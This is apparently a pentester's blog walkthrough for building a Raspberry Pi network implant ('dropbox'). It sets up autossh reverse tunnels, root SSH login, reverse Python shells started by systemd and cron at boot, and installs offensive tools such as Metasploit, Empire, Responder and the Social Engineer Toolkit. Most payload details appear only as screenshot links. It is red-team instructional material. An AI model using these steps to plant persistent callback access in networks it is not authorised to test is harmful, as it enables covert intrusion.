Links

Build A Raspberry Pi Dropbox

Im leaving this here for a bit as I have not finished my other post but there is a much better way to do this which I use in red teams

Archived

I have created a script to automate all of this so this writeup is obsolete
https://github.com/jdksec/RpiPentestingDropbox
First download and install Raspbian onto a SD card. there are loads of guides on how to do this.
I chose the light version which is perfect for making something speedy and I did not want it bloated with a lot of GUI stuff I did not want.
Win32 Disk imager is my preference as you can write over the entire SD card in one hit. Other Linux methods work just as well.
Insert the card, boot the pi and login with the username and password pi:raspbian
Change your password to something strong
sudo su (Become root)
passwd pi #set a strong password
passwd root #set a stong password
Now make sure you have ssh listening on your “attacker machine”
service ssh start
Install openssh-server
apt-get install openssh-server
# Regenerate the keys
dpkg -i openssh-server
Now you want to enable root login and have it ready every time it boots
ifconfig #to get your current IP
raspi-config
Select “5 Interfacing Options
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99c4380fd55.png
Then select ssh and enable it
Reboot the pi and try to login with your current ip.
Now that is working you need configure autossh
sudo su (Become root)
apt-get install autossh
useradd -m -s /sbin/nologin piusername
su – piusername -s /bin/bash
ssh-keygen
(Dont set a passphrase)
Now you need to create a user on your attacker machine for the pi to connect to.
useradd -m -s /bin/bash localusername
passwd localusername #set a very secure password as this will be open
Ensure you can login via your localhost.
Once that is verified move to the next step.
You need to copy over your ssh id to the remote server.
The ideal way to do this is to add it manually (copy and paste via ssh) although you can use the following:
ssh-copy-id [email protected]
Seeing as I was logged in via ssh I copied and pasted my id into a newly created authorized_keys file in /root/.ssh/
Make sure the permissions are all good.
chmod 600 /root/.ssh/*
Also ensure you allow root login.
echo “PermitRootLogin yes” >> /etc/ssh/sshd_config
There are several ways to create a startup file but I prefer to create a new systemd service as this has proven the most reliable.us
Steps to do that are as follows:
nano /etc/systemd/system/autossh.service
Create the following file
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99cc0734551.png
Now run the following commands
systemctl daemon-reload
systemctl start autossh.service
systemctl status autossh.service
If you see this then you are good to go to the next step
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99cd98ecbe0.png
Now enter the following command on your attacker machine.
ssh [email protected] -p 2222
If you can login then you are good to go. The machine will create a reverse tunnel whenever the autossh.service is started.
The last command you need to run to enable autossh on boot is:
systemctl enable autossh.service
Providing all the above worked without errors (There may be some depending on your configuration) reboot the machine and wait until you can ssh into the pi.
ssh [email protected] -p 2222
Installing Tools
Once that is up and running you can start installing your tools, most of these are easy and work out of the box some are more difficult and I have detailed them below.
If you want a list of the basic tools I installed they are below:
apt-get install nmap wifite cutycapt screen locate
Metasploit Install
This was a bit of a nightmare as it will not work out of the box with this old raspberry pi, if it does not work for you be prepared to google your errors.
You need to install a load of tools and dependencies to get this up and running so I am already missing Kali but I will press ahead and get it working as I want this on the machine.
I managed to strip it down to the following
cd /opt
git clone https://github.com/rapid7/metasploit-framework.git
Now install some stuff
apt-get -y install build-essential zlib1g zlib1g-dev libxml2 libxml2-dev libxslt-dev locate libreadline6-dev libcurl4-openssl-dev git-core libssl-dev libyaml-dev openssl autoconf libtool ncurses-dev bison curl wget postgresql postgresql-contrib libpq-dev libapr1 libaprutil1 libsvn1 libpcap-dev git-core postgresql curl ruby nmap gem bundler
Most of these will already be installed
Before you can move on and install metasploit you need a few other bits, the following worked for me (you may need to tweak it)
apt-get install libsqlite3-dev
# if that does not work
gem install sqlite3 -v ‘1.3.13’
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99dcbb68344.png
The next command takes ages and appears to do nothing (it warns you) but give it time.
gem install nokogiri -v ‘1.8.2’
After about 9 months you should see this:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99da239039e.png
Once they are installed we can “try”
bundle install
You will get a warning about running bundler as root and a recommendation to install bundler via gem but I carried on regardless as this is just a test.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99de5f72f11.png
At this point the pi became unresponsive so its a good time to test out the autossh viability.
I pulled the powercable to give it a hard reset and plugged it in and within 40 seconds I had a ssh connection.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e101cfce6.png
Considering the last response from bundler I decided to update it.
gem install bundler
This took a while on a fresh boot but we are nearly there.
Now it is actually working
This installed and seemed to work so lets see how the raspberry pi handles msfconsole.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e451bfbce.png
Wow it was faster than I thought and took about 45 seconds
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e5a745ee7.png
Lets test it out with a rev shell, it looks like it is working so far.
Create one with msfvenom on your attacker machine
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e793db527.png
Set up a listener
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e7cd6d996.png
Execute the shell
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e84b39545.png
Watch your listener for a shell
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e86ede455.png
It works.
Looks like the latest exploits are installed as well so we can move on to the next tool.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99e8eb0ec1b.png
Modify .bashrc with the following command to make it run in any dir. or you can add it to your bin.
(FYI I tweaked my .bashrc at this point to make my console stand out)
echo alias “msfconsole=’/opt/metasploit-framework/msfconsole'” >> ~/.bashrc
source ~/.bashrc
Test it works
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99f2fc317d7.png
Also add msfvenom to your .bashrc for easy shells
echo alias “msfvenom=’/opt/metasploit-framework/msfvenom'” >> ~/.bashrc
source ~/.bashrc
Creating other methods of access.
Now we want to add a few other shells incase we are unable to get autossh out of the firewall to make sure you can access the machine.
We will use python as the arm architecture does not play well with msfvenom
Reverse HTTPs python shell (Port 80):
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5ae90ddba.png
Reverse HTTPS python shell:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ae21c5a85f.png
Reverse python HTTPS shell via port 53
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9adfbb1b284.png
Now create the following file on your attacker machine called meterpreter.rc.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5a2aa3d92.png
Run the .rc file with the below command:
msfconsole -q -r meterpreter.rc
Check your shells work
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ae2d6af472.png
Shells received.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ae45bab424.png
These are pretty handy if you have some local tools you want to run against the host or if you want to pivot with metasploit.
Now create three services in /etc/systemd/system with the following contents.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c52f09b047.png
Start each of the services to make sure they work.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5463da760.png
Enable your services to start at boot.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c54b28f14d.png
Exit meterpreter and start your handlers from scratch.
msfconsole -q -r meterpreter.rc
Reboot the pi and you should see three shells come back.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c5bcadf990.png
Now we have four ways for our pi to call back to us.
Another method which may be easier is to create a cronjob.
Create the following file Shells.sh
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c639694fdc.png
Make the file executable
chmod +x Shells.sh
Open crontab with
crontab -e
Add the following entry:
@reboot /bin/bash /root/Shells.sh
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c63e50fc0d.png
Exit and save the pi and reboot.
Open your listener again and after a while you should see your shells come back.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9c64a5cebf6.png
Searchsploit
git clone https://github.com/offensive-security/exploit-database.git /opt/exploit-database
Not sure why you would not have this on your local machine but it always helps
Make searchsploit executable and test it.
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99ed186ef24.png
It works so add it to your .bashrc file
Be careful not to overwrite it
echo alias “searchsploit=’/opt/exploit-database/searchsploit'” >> ~/.bashrc
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99eff96ee52.png
Type the following:
source ~/.bashrc
Check it works outside of the exploitdb folder
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99f0796dc99.png
Python.
So Raspbian comes with python installed.
First we will install pip (Easy python installs)
apt-get install python-pip
You can add your tools via pip as you need them but just for a demo. (this was already installed)
python -m SimpleHTTPServer 81
Lets see what we can host internally
http://sicurolab.com/wp-content/uploads/2018/03/img_5a99fb0d36438.png
Ok happy with that, not my best fake website but you get the idea.
Nishang
cd /opt/
git clone https://github.com/samratashok/nishang.git
Best powershell reverse shell I have found so far which you can host via python.
This combined with a bash bunny is really handy.
Unicorn
Another amazing powershell tool you want on this machine
cd /opt/
git clone https://github.com/trustedsec/unicorn.git
Responder
cd /opt/
git clone https://github.com/SpiderLabs/Responder.git
Very good tool
Empire
Another tool to add which will be useful for internal tests.
cd /opt
git clone https://github.com/adaptivethreat/Empire.git
cd Empire/setup
apt-get install python-m2crypto
pip install pyminifier
./install.sh
Once installed you should see this:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9ac6ba404da.png
Social Engineer Toolkit
Another great tool most of the dependencies are already installed
cd /opt
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
python setup.py install
Setup should end like this:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9b09f464633.png
Now set is installed:
http://sicurolab.com/wp-content/uploads/2018/03/img_5a9b0a31ef977.png